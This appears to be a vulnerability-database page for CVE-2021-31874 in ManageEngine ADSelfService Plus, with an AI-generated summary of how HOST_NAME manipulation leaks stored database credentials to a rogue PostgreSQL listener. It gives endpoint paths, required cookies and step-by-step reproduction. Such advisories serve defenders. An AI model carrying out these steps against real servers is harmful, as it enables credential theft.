CVE-2021-31874
Description
Zoho ManageEngine ADSelfService Plus before 6104, in rare situations, allows attackers to obtain sensitive information about the password-sync database application.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
ManageEngine ADSelfService Plus before 6104 allows authenticated users to leak database credentials by manipulating the HOST_NAME parameter during external database linking.
Vulnerability
The vulnerability resides in the HOST_NAME parameter used when linking an external database for password synchronization in Zoho ManageEngine ADSelfService Plus. The parameter accepts any IP address without validation, allowing an attacker to specify a malicious server. Affected versions are before build 6104. [1]
Exploitation
An attacker must have valid domain user credentials and a valid JSESSIONIDADSSP and JSESSIONIDADSSPSSO cookie. The attacker sets up a fake PostgreSQL server on a machine they control, logs into ADSSP, retrieves the APP_ID and APP_CONFIG_ID for the PostgreSQL application, then sends a request with the HOST_NAME parameter set to the IP of the fake server. The ADSSP server attempts to authenticate to the fake database, sending the stored credentials in the process. [1]
Impact
Successful exploitation reveals the database credentials (username and password) used for password synchronization. This could lead to unauthorized access to the actual database and potentially other systems that rely on those credentials. [1]
Mitigation
The issue is fixed in version 6104. Users should upgrade to this version or later. No workaround is documented, and the vulnerability is not listed on the CISA Known Exploited Vulnerabilities (KEV) catalog. [1]
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- Zoho ManageEngine/ADSelfService Plusdescription
- Range: <6104
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing validation of the HOST_NAME parameter allows an attacker to redirect the server's authentication attempt to an attacker-controlled database, leaking administrator-configured credentials."
Attack vector
An authenticated domain user sends a POST request to `/ServletAPI/selfService/IAMApps/linkAccountUsingPass` with a manipulated `HOST_NAME` parameter set to the IP of an attacker-controlled server running a fake database listener (e.g., a rogue PostgreSQL instance). The ADSelfService Plus server then attempts to authenticate to that fake database using the administrator-configured credentials for the linked application, causing the credentials to be transmitted to the attacker [ref_id=1]. The attacker must have a valid JSESSIONIDADSSP and JSESSIONIDADSSPSSO cookie and know the target APP_ID and APP_CONFIG_ID values [ref_id=1].
Affected code
The vulnerability lies in the `HOST_NAME` parameter sent during the "link account with external database" operation, specifically in the `/ServletAPI/selfService/IAMApps/linkAccountUsingPass` endpoint. The server does not validate the IP address supplied in `HOST_NAME`, allowing an attacker to point it at an arbitrary machine [ref_id=1].
What the fix does
The advisory states that the fixed version (6104) was released on 08-05-2021, but no patch diff is provided in the bundle [ref_id=1]. The remediation guidance implied by the vulnerability description is that the server should validate the `HOST_NAME` parameter to ensure it points only to a trusted, pre-configured database server rather than an arbitrary IP supplied by the client [ref_id=1].
Preconditions
- authAttacker must have valid JSESSIONIDADSSP and JSESSIONIDADSSPSSO cookies for an authenticated domain user
- inputAttacker must know the APP_ID and APP_CONFIG_ID values for the target external database application
- networkAttacker must control a machine that can run a fake database listener (e.g., PostgreSQL) on the port expected by the application
- configThe ADSelfService Plus version must be below 6104
Reproduction
1. Install PostgreSQL and add it as a Configured Application in ADSSP with Password Sync enabled. 2. Run the `postgres-pass.py` script on a machine other than the ADSSP/PostgreSQL server (port 5432 must be free). 3. Log in to ADSSP as any domain user and copy the `JSESSIONIDADSSP` and `JSESSIONIDADSSPSSO` cookie values. 4. Send `GET /ServletAPI/selfService/IAMApps/getIAMApps` with the valid cookies to retrieve `APP_ID` and `APP_CONFIG_ID`. 5. Send `POST /ServletAPI/selfService/IAMApps/linkAccountUsingPass` with `HOST_NAME` set to the IP of the machine running `postgres-pass.py`, along with the valid cookies, `APP_CONFIG_ID`, `APP_ID`, and dummy `USERNAME`/`PASSWORD` values. 6. Observe the captured credentials in the output of `postgres-pass.py` [ref_id=1].
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
2- blog.stmcyber.com/vulns/cve-2021-31874/mitrex_refsource_MISC
- pitstop.manageengine.com/portal/en/community/topic/adselfservice-plus-6104-released-with-an-important-security-fixesmitrex_refsource_MISC
News mentions
0No linked articles in our index yet.